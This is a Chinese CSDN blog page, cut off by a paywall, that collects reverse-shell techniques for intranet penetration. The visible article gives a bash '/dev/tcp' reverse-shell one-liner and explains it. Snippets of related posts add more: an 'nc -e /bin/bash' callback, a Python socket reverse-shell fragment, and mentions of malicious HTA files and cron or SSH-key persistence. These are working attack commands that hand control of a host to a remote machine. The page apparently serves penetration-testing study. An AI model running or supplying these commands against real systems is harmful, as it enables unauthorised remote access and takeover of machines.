内网渗透-常用反弹shell方法总结

已于 2023-01-20 00:33:37 修改
阅读量4.7k 收藏 34
点赞数 4
分类专栏: 内网渗透 文章标签: 安全性测试 web安全 安全
于 2022-08-28 00:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lza20001103/article/details/126558175
版权
本文总结了多种内网渗透中常用的反弹shell方法,包括bash、nc、whois、python、php、powercat和msf。详细介绍了各种方法的使用场景和命令实例,是进行安全测试和web安全研究的重要参考资料。
摘要由CSDN通过智能技术生成

常用反弹shell方法总结

文章目录

前言

bash反弹shell

bash -i >&/dev/tcp/1.1.1.1/9999 0>&1
在这里插入图片描述
在这里插入图片描述
解释:

bash -i [interface] 表示启动shell窗口

(>)表示将这个窗口重定向到指定的地方,也就是将输出交给后面

&表示将该命令转到后台执行 (我看其他文章也有将&解释成等同于的,如2>&1 就表示stderr标准错误重定向为等同于stdout标准输出)

/dev/tcp/x.x.x.x/port表示发出一个socket调用,建立一个socket连接,读写这个文件等同于socket连接中传输数据.x.x.x.x表示要反弹到的主机的ip,port为端口 (同理linux中还存在/dev/udp)

0表示s

了解本专栏 订阅专栏 解锁全文 超级会员免费看
炫彩@之星
关注
专栏目录
订阅专栏
内网渗透-内网信息收集
lza20001103的博客
09-21 9573
内网信息收集 文章目录内网信息收集前言msf模块中的信息收集msf反弹shell后的信息收集内网信息收集后记 前言 当我们进行外网信息收集,漏洞探测以及漏洞利用后,获得了主机的权限后,我们需要扩大渗透的战果时,这是我们就要进行内网的渗透了,内网渗透最重要的还是前期的信息收集的操作了,就是我们的内网信息收集了,信息收集需要收集什么内容,对后期的横向和纵向移动都有很大的帮助。接下来给大家总结一下内网渗透中的信息收集的模块内容。 msf模块中的信息收集 Msf模块 run post/ run post/windo
内网渗透-反弹shell的N种姿势
lza20001103的博客
09-04 773
反弹shell的N种姿势 文章目录反弹shell的N种姿势0x00 前言0x01 Bash反弹1.1 方法一1.2 方法二1.3 方法三0x02 telnet反弹2.1 方法一2.2 方法二0x03 nc(netcat)反弹0x04 常见脚本反弹4.1 python4.2 perl4.2.1 方法一4.2.2 方法二4.3 Ruby4.3.1 方法一4.3.2 方法二4.4 PHP4.5 Java4.6 Lua0x05 总结0x06 参考连接 0x00 前言 在渗透测试的过程中,在拿到webshell以后,
反弹shell汇总
chang113的博客
06-12 801
反弹shell整理
Linux渗透之反弹Shell命令解析
deeplearnings的博客
08-18 10000
前言 当我们在渗透Linux主机时,反弹一个交互的shell是非常有必要的。在搜索引擎上搜索关键字“Linux 反弹shell”,会出现一大堆相关文章,但是其内容不但雷同,而且都仅仅是告诉我们执行这个命令就可以反弹shell了,却没有一篇文章介绍这些命令究竟是如何实现反弹shell的。既然大牛们懒得科普,那我就只好自己动手了。本文就来探讨一下相关命令实现的原理。 B
各种反弹shell方式
最新发布
Lpyzdzs的博客
10-19 484
反弹shell
反弹shell常见方法总结
qq_45746681的博客
10-08 858
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一.Bash反弹二.telnet反弹三.nc反弹四.常见脚本反弹: 前言 记录并总结常用到的各种反弹shell的姿势,方便以后使用 环境:攻击机:windows,192.168.0.105 服务器:kail,192.168.0.107 一.Bash反弹 首先在攻击机上执行 nc -lvvp 3333 进行监听 在kail机上执行 bash -i >& /dev/tcp/192.168.0.105/3333
内网转发——反弹shell
cxrpty的博客
03-16 1148
内网转发的目的: 渗透测试中,我们往往会面对十分复杂的内网环境,比如最常用的防火墙,它会限制特定端口的数据包出入。 代理方式: 正向代理:正向代理是服务器开放端口,客户端主动访问服务器的端口。正向代理的过程是它隐藏了真实的请求客户端,服务端不知道真实的客户端是谁,客户端请求的服务都被代理服务器代替来请求。 反向代理:反向代理是客户端开发端口,服务器连接客户端。反向代理是相对于服务...
内网渗透-反弹Shell
道阻且长,行则将至。
07-07 3346
概述 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、we
反弹shell常用命令
mirocky的博客
01-15 8712
反弹shell常用命令 1 attacker端的监听——netcat (1) windows环境下下载netcat 下载地址 将如图的nc.exe所在文件夹添加到环境变量 (2) linux环境下下载netcat yum install netcat (3) 安装结束 使用如下命令判断是否安装成功 nc -h 使用如下命令开始监听 nc -lvvp port 2 靶机命令 (1) bash bash一句话为: bash -i >& /dev/tcp/ip/port 0>&a
反弹shell
热门推荐
weixin_39430198的博客
03-09 1万+
一、课时目标 1.理解shell的概念 2.理解交互式shell和非交互式shell的区别 3.掌握反弹shell的原理和方法
内网渗透-反弹shell.pdf
10-28
这是一份学习笔记,各个文章的摘抄整合。比较全面的反弹shell方法
内网渗透之Windows反弹shell(综合)
墨鱼菜鸡
09-10 1103
目录 反向shell简介 01什么是正向shell 02什么是反向shell Windows反弹shell 01NC正向shell 01NC反向shell 02mshta.exe 通过Metasoloit的HTA Web Server模块发起HTA攻击 通过msfvenom生成恶意hta文件 03Rundll32.exe 04Reg...
内网渗透之Linux反弹shell(综合)
墨鱼菜鸡
09-10 1397
目录 知识点 Linux mkfifo命令基本用法 1.首先了解linux命令执行顺序 2.然后了解下管道命令(pipe) 3.常见管道命令 4.mkfifo则可以创建命名管道 Linux标准文件描述符 更改标准输出的位置 更改标准输入的位置 /dev/null 重定向 输入重定向 输出重定向 管道 环境 01NC正向Sh...
Linux常用反弹shell命令
m0_63200360的博客
04-24 3235
什么是反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。为什么要反弹shell?通常用于被控端因防火墙受限、权限不足、端口被占用等情形。举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。
linux系统常用命令利用——反弹shell
初学者L_言的博客
05-19 421
一、环境 Aliyun Linux (192.168.47.136) Metasploitable2 Linux (192.169.47.133) 目的: 将Metasploitable 的 shell 反弹给 Aliyun 二、具体实操 2.1 通过 linux 命令 NC 1、首先 Aliyun 侦听某个端口 如 4444 端口 nc -nvlp 4444 2、Meta..上执行: nc -e /bin/bash 192.168.47.136 4444 2.2 通过bash命令 1、首先 Ali
Linux反弹shell
谢公子的博客
11-29 9481
目录 Bash反弹shell Python反弹shell 其他命令反弹shell 写入命令到定时任务文件 写入SSH公钥 写入/etc/profile文件 当我们可以在远程Linux主机上执行任意命令或写入任意数据到任意文件的时候,我们通常会通过以下方式控制远程主机。 Bash反弹shell Linux 反弹 shell 使用下面这条命令,该命令弹回来的shell是不可交互的,...
linux 渗透 密码,linux渗透中常用命令+Tip
weixin_42128141的博客
05-03 225
1.bashattacker 监听nc -lvvp 4444victim 运行bash -i >& /dev/tcp//4444 0>&12. pythonattacker 监听nc -lvvp 4444victim 运行python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,sock...
Linux内网渗透反弹shell技术详解
"这份学习笔记整合了多种反弹shell方法,包括bash反弹、telnet反弹和nc反弹,主要面向网络安全内网渗透领域的学习者。内容详尽地介绍了各种反弹shell命令行操作,适用于Linux环境,并提醒注意不同发行版可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值